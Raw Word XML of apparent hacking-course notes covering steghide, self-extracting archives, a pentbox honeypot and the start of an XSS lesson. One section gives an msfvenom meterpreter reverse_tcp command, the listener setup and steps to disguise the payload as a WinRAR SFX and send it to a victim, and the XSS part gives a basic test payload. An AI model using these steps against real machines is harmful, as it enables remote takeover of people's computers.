    <w:p w14:paraId="000004E9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>apt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">-get install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>steghide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000004EA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004EB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Cover file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004EC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:tab/>
        <w:t>embed file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004ED" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>To extract the hidden file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004EE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-sf</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004EF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004F0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>steghide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> embed -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1.jpg -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004F1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>enter password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004F2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004F3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>To extract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004F4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>steghide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> extract -sf image.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004F5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004F6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000004F7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Using SFX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004F8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Self Extracting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004F9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>-ITs a compute executable program that contains one or more compressed files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004FA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Compression programs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000004FB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rarlab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000004FC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>corel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000004FD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>zip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="000004FE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ESTsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Alzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000004FF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smrat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SFX pro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000500" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000501" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">TOOL - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Trojanizer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000502" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winrar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SFX to compress two file input given by the user and it transforms it into an SFX </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exece</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000503" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000504" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO DO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000505" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000506" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Generate a payload using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000507" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST=192.168.1.7 LPORT=4444 -f exe &gt; autoconfig.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000508" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000509" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">2. Kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000050A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>listner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000050B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000050C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000050D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST 192.168.1.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000050E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000050F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000510" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000511" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">3. Download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>trojanizer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000512" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>give autoconfig.exe in first pop up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000513" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>give winrar.exe in second pop up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000514" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>choose icon and file name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000515" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">output will be saved in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>trojanizer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000516" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000517" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. Send the output fil to windows 7 victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000518" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>execute the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000519" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">we will get output in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000051A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000051B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000051C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>HONEYPOTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000051D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000051E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tOOL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000051F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000520" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> clone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000521" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000522" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zxvf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pentbox.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000523" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000524" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>#./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>pentbox.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000525" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000526" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Firewall, IDS, IPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000527" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000528" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Intrusion Detection </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">System  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(Wireshark, CCTV)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000529" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Intrusion Prevention System</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>(A/v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000052A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000052B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000052C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000052D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000052E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000052F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000530" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000531" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000532" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000533" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000534" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000535" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000536" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000537" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000538" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000539" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000053A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000053B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000053C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>12-11-2021, FRIDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000053D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000053E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>CROSS SITE SCRIPTING (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000053F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000540" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000541" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. STEPS TO IDENTIFY XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000542" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3. TYPES OF XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000543" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. PRACTICE WEBSITES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000544" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000545" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>introduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000546" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> allows user to inject client side code or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>script  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">mostly </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or html) in websites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000547" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>normally these scripts are executed in input fields of any websites (search box, login form, feedback form, comments section etc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000548" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000549" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">steps to identify </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000054A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>we need to find input field or parameter in any website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000054B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>search box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000054C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>new registration form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000054D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>document upload menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000054E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>URL input parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000054F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>contact us form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000550" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>subscribe field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000551" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000552" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">we can check whether they are vulnerable to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000553" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>we need to execute scripts in those fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000554" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000555" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">script - one line code or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>two line</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code - html or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000556" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000557" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">basic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code or payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000558" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000559" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">/script&gt; - basic script and when this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exexute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, it displays a pop up in the webpage and shows 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000055A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
